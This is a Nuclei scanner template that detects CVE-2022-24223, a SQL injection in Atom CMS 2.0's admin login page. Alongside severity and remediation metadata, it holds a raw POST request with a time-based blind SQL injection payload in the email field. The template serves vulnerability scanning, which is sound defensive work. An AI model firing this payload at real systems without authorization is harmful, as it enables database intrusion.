nuclei-templates/http/cves/2022/CVE-2022-24223.yaml

46 lines
1.6 KiB
YAML

id: CVE-2022-24223
info:
name: Atom CMS v2.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
remediation: Fixed in version Atom CMS v2.1
reference:
- https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
- https://github.com/thedigicraft/Atom.CMS/issues/255
- https://nvd.nist.gov/vuln/detail/CVE-2022-24223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24223
cwe-id: CWE-89
epss-score: 0.11255
epss-percentile: 0.94623
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: thedigitalcraft
product: atomcms
tags: packetstorm,cve,cve2022,sqli,atom,cms,thedigitalcraft
http:
- raw:
- |
@timeout: 10s
POST /admin/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")'
condition: and
# digest: 490a00463044022066baad53445ad482d2e61a0c0c676f751c9b22b5780ddd8c2d2be32f463e14a20220761858d72b831e2efdc0e86d577e70e3d9f8040574d1187154adba0894a19cf0:922c64590222798bb761d5b6d8e72950